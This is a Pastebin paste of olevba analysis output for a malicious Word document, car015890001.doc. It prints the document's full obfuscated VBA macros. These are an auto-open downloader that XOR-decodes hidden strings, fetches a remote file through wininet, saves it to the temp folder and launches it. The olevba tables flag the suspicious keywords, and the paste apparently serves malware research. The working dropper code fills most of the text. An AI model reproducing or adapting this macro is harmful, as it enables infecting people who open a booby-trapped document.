Advertisement
dynamoo

Malicious Word macro

Apr 9th, 2015
609
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- car015890001.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: car015890001.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: car015890001.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub InIn()
  17. D22D22D22D22
  18. End Sub
  19.  
  20. Sub autoopen()
  21. InIn
  22. End Sub
  23.  
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. ANALYSIS:
  26. +------------+-------------+-----------------------------------------+
  27. | Type       | Keyword     | Description                             |
  28. +------------+-------------+-----------------------------------------+
  29. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  30. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  31. |            |             | be used to obfuscate strings (option    |
  32. |            |             | --decode to see all)                    |
  33. +------------+-------------+-----------------------------------------+
  34. -------------------------------------------------------------------------------
  35. VBA MACRO FILE6.bas
  36. in file: car015890001.doc - OLE stream: u'Macros/VBA/FILE6'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38.  
  39. Option Explicit
  40. Public Const C1C1C1A = "D25D25D25D25"
  41.  
  42.  
  43.  
  44. Private Const D1D1D1D1 = 8162
  45. Private Const D2D2D2D2 As String = "D3D3D3D3D3"
  46. Private Const D4D4D4D4 = 1
  47. Private Const D5D5D5D5 = &H4000000
  48.  
  49. Public Function C16C16C16 _
  50. (ByVal D6D6D6D6 As String) As Boolean
  51.     #If VBA7 _
  52.     And Win64 Then
  53.         Dim D7D7D7D7 As LongPtr, D8D8D8D8 As LongPtr
  54.     #Else
  55.         Dim D7D7D7D7 As Long, D8D8D8D8 As Long
  56.     #End If
  57.     Dim D10D10D10D10 As Long
  58.     Dim C33C33C33 As String * D1D1D1D1, D9D9D9D9 As String
  59.     Dim D11D11D11D11 As Integer, D12D12D12D12 As Double
  60.     D7D7D7D7 = C2C2C2(D2D2D2D2, D4D4D4D4, vbNullString, vbNullString, 0)
  61.     If D7D7D7D7 = 0 Then
  62.         Exit Function
  63.     End If
  64.     Dim FiGaMan As Boolean
  65.    
  66.     If D15D15D15D15(D8D8D8D8, D7D7D7D7) Then
  67.     End If
  68.     If D8D8D8D8 = 0 Then
  69.         D12D12D12D12 = 0
  70.     Else
  71.         C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
  72.         D9D9D9D9 = C33C33C33
  73.         Do While D10D10D10D10 <> 0
  74.             C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
  75.            
  76.             Dim Z1z1Z1z1Z1z1 As Integer
  77.            
  78. For Z1z1Z1z1Z1z1 = 110 _
  79. To 111
  80. If Z1z1Z1z1Z1z1 = 1000 Then _
  81. End
  82. Next Z1z1Z1z1Z1z1
  83.            
  84.             D9D9D9D9 = D9D9D9D9 + Mid(C33C33C33, 1, D10D10D10D10)
  85.         Loop
  86.             D12D12D12D12 = D13D13D13D13(D9D9D9D9): D11D11D11D11 = FreeFile
  87.         Open D6D6D6D6 _
  88.             For Binary Access Write _
  89.         Lock Write _
  90.         As #D11D11D11D11
  91.         Put #D11D11D11D11, _
  92.                 , D9D9D9D9
  93.         Dim S1s1S1s1S1s1S1s1 As _
  94.         Long
  95.             For S1s1S1s1S1s1S1s1 = 111 To 112
  96.     If S1s1S1s1S1s1S1s1 = 2000 Then _
  97.     End
  98. Next S1s1S1s1S1s1S1s1
  99.         Close #D11D11D11D11
  100.     End If
  101.     C1C1C1 D8D8D8D8
  102.     C1C1C1 D7D7D7D7
  103.     D9D9D9D9 = ""
  104.     If D12D12D12D12 Then
  105.         C16C16C16 = True
  106.     End If
  107. End Function
  108.  
  109.  
  110. Public Function D13D13D13D13(D14D14D14D14 As String) As Long
  111. D13D13D13D13 = Len(D14D14D14D14)
  112. End Function
  113.  
  114. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  115. ANALYSIS:
  116. +------------+-------------+-----------------------------------------+
  117. | Type       | Keyword     | Description                             |
  118. +------------+-------------+-----------------------------------------+
  119. | Suspicious | Open        | May open a file                         |
  120. | Suspicious | Write       | May write to a file (if combined with   |
  121. |            |             | Open)                                   |
  122. | Suspicious | Put         | May write to a file (if combined with   |
  123. |            |             | Open)                                   |
  124. | Suspicious | Binary      | May read or write a binary file (if     |
  125. |            |             | combined with Open)                     |
  126. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  127. |            |             | be used to obfuscate strings (option    |
  128. |            |             | --decode to see all)                    |
  129. +------------+-------------+-----------------------------------------+
  130. -------------------------------------------------------------------------------
  131. VBA MACRO PIDLE0.bas
  132. in file: car015890001.doc - OLE stream: u'Macros/VBA/PIDLE0'
  133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  134.  
  135. #If VBA7 And Win64 Then
  136. Public _
  137. Declare _
  138. PtrSafe _
  139. Function _
  140. C1C1C1 Lib _
  141. "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
  142. Public _
  143. Declare _
  144. PtrSafe _
  145. Function _
  146. C2C2C2 Lib _
  147. "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
  148. Public _
  149. Declare _
  150. PtrSafe _
  151. Function _
  152. C3C3C3 Lib _
  153. "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
  154. Public _
  155. Declare _
  156. PtrSafe _
  157. Function _
  158. C4C4C4 Lib _
  159. "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
  160. #Else
  161. Public Declare Function C1C1C1 Lib "wininet.dll" _
  162. Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
  163. Public Declare Function C2C2C2 Lib "wininet.dll" _
  164. Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
  165. Public Declare Function C3C3C3 Lib "wininet.dll" _
  166. Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
  167. Public Declare Function C4C4C4 Lib "wininet.dll" _
  168. Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
  169. #End If
  170.  
  171.  
  172.  
  173.  
  174. Public Function C21C21C21() As Object
  175. Dim C22C22C22 As String
  176. C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
  177. Set C21C21C21 = CreateObject(C22C22C22)
  178. End Function
  179.  
  180.  
  181. Sub D22D22D22D22()
  182.         Dim D23D23D23D23 As Long
  183.  
  184.     Dim D21D21D21D21S As Integer
  185. For D21D21D21D21S = 1101 To 1110
  186. If D21D21D21D21S = 1111 Then End
  187. Next D21D21D21D21S
  188. D23D23D23D23 = 111
  189. D24D24D24D24 (D23D23D23D23)
  190.  
  191. End Sub
  192. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  193. ANALYSIS:
  194. +------------+----------------+-----------------------------------------+
  195. | Type       | Keyword        | Description                             |
  196. +------------+----------------+-----------------------------------------+
  197. | Suspicious | CreateObject   | May create an OLE object                |
  198. | Suspicious | Lib            | May run code from a DLL                 |
  199. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  200. |            |                | be used to obfuscate strings (option    |
  201. |            |                | --decode to see all)                    |
  202. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  203. |            |                | may be used to obfuscate strings        |
  204. |            |                | (option --decode to see all)            |
  205. | IOC        | wininet.dll    | Executable file name                    |
  206. +------------+----------------+-----------------------------------------+
  207. -------------------------------------------------------------------------------
  208. VBA MACRO IDL4.bas
  209. in file: car015890001.doc - OLE stream: u'Macros/VBA/IDL4'
  210. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  211.  
  212.  
  213. Public Const C18C18C18 = "102B262F2F6D023434282D2725372A2C2D"
  214. Public Const C19C19C19 = "1F2A3737263B37756A716A213C26"
  215. Public Const C20C20C20 = "2B373733796C6C2B2A21292D2A2724312C36336D202B296B7772726C727277"
  216. Public Const C10C10C10 = "1020312A33372A2A236A022D2826103A3037262E0C262E212730"
  217. Public Const C9C9C9 = "CCCCCCCCDDDDDD"
  218. Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
  219. If CAILEIGH.FileExists(CAILYN) Then
  220. CADY = True
  221. Else
  222. CADY = False
  223. End If
  224. End Function
  225. #If VBA7 _
  226.     And Win64 Then
  227.        Public Function D15D15D15D15(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
  228.     #Else
  229.        Public Function D15D15D15D15(ByRef CALIDA As Long, CALLA As Long) As Boolean
  230.     #End If
  231. Dim CALLIDORA As String
  232.     CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
  233.    
  234.                 CALIDA _
  235.     = C4C4C4 _
  236.     ( _
  237.     CALLA, _
  238.     CALLIDORA, vbNullString, _
  239.     0, _
  240.     D5D5D5D5, 0)
  241.     D15D15D15D15 = True
  242. End Function
  243.  
  244.  
  245. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  246. ANALYSIS:
  247. +------------+-------------+-----------------------------------------+
  248. | Type       | Keyword     | Description                             |
  249. +------------+-------------+-----------------------------------------+
  250. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  251. |            |             | be used to obfuscate strings (option    |
  252. |            |             | --decode to see all)                    |
  253. +------------+-------------+-----------------------------------------+
  254. -------------------------------------------------------------------------------
  255. VBA MACRO M.bas
  256. in file: car015890001.doc - OLE stream: u'Macros/VBA/M'
  257. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  258.  
  259.  
  260. Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
  261. Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
  262. End Function
  263. Sub D24D24D24D24(CALEIGH As Long)
  264.  
  265. C25C25C25 ("CACACARDRDRDRD")
  266. End Sub
  267.  
  268.  
  269. Public Function C8C8C8(D16D16D16D16 As String, D17D17D17D17 As String) As String
  270.    
  271.     Dim D18D18D18D18 As Integer
  272.     Dim D19D19D19D19 As Integer
  273.    
  274.    
  275.     Dim W1w1W1w1W1w1W1w1 As _
  276.     Long
  277. For W1w1W1w1W1w1W1w1 = 1110 To 1111
  278. If W1w1W1w1W1w1W1w1 = 1000 Then _
  279. End
  280. Next W1w1W1w1W1w1W1w1
  281.     Dim D30D30D30D30 As Long
  282.     D30D30D30D30 = D13D13D13D13(D17D17D17D17)
  283.     D30D30D30D30 = D30D30D30D30 / 2
  284.     Dim D20D20D20D20 As Long
  285.     Dim D21D21D21D21 As String
  286.     For D20D20D20D20 = 1 _
  287.     To _
  288.     D30D30D30D30
  289.         D18D18D18D18 = Val("&H" & _
  290.         (Mid$(D17D17D17D17, _
  291.         (2 * D20D20D20D20) - 1, 2)))
  292.         D19D19D19D19 = Asc(Mid$(D16D16D16D16, _
  293.         ((D20D20D20D20 Mod D13D13D13D13(D16D16D16D16)) + 1), 1))
  294.         D21D21D21D21 = D21D21D21D21 + Chr(D18D18D18D18 Xor D19D19D19D19)
  295.     Next D20D20D20D20
  296.    C8C8C8 = D21D21D21D21
  297. End Function
  298.  
  299. Public Function C25C25C25(C24C24C24 As String)
  300. C6C6C6
  301. End Function
  302.  
  303. Public Function C6C6C6()
  304.  
  305. Dim C7C7C7  As Object
  306. Set C7C7C7 = C21C21C21
  307. Dim C11C11C11 As Object
  308. Set C11C11C11 = C5C5C5(C7C7C7)
  309.  
  310. Dim C15C15C15
  311. Dim C12C12C12
  312. C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
  313. C15C15C15 = C11C11C11 & C12C12C12
  314.  
  315.  
  316. If CADY(C7C7C7, C15C15C15) Then
  317. C7C7C7. _
  318. DeleteFile C15C15C15
  319. End If
  320. If C16C16C16(C15C15C15) Then
  321. End If
  322. If CADY(C7C7C7, C15C15C15) Then
  323. End If
  324. Dim C17C17C17
  325. Set C17C17C17 = CreateObject _
  326. (C8C8C8 _
  327. (C9C9C9, C18C18C18))
  328. C17C17C17.Open C15C15C15
  329. End Function
  330.  
  331.  
  332. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  333. ANALYSIS:
  334. +------------+--------------+-----------------------------------------+
  335. | Type       | Keyword      | Description                             |
  336. +------------+--------------+-----------------------------------------+
  337. | Suspicious | CreateObject | May create an OLE object                |
  338. | Suspicious | Open         | May open a file                         |
  339. | Suspicious | Chr          | May attempt to obfuscate specific       |
  340. |            |              | strings                                 |
  341. | Suspicious | Xor          | May attempt to obfuscate specific       |
  342. |            |              | strings                                 |
  343. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  344. |            |              | be used to obfuscate strings (option    |
  345. |            |              | --decode to see all)                    |
  346. +------------+--------------+-----------------------------------------+
  347. -------------------------------------------------------------------------------
  348. VBA MACRO UserForm1.frm
  349. in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm1'
  350. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  351. (empty macro)
  352. -------------------------------------------------------------------------------
  353. VBA MACRO UserForm2.frm
  354. in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm2'
  355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  356. (empty macro)
  357. -------------------------------------------------------------------------------
  358. VBA MACRO UserForm3.frm
  359. in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm3'
  360. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  361. (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement